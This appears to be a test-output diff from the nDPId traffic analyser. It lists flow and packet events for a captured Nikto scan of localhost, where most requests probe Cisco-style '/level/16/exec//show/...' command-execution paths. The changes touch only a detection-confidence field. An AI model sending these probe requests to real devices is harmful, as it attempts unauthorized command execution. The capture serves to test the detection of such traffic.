00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} +01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="} -01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} +01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} +01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} +01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} 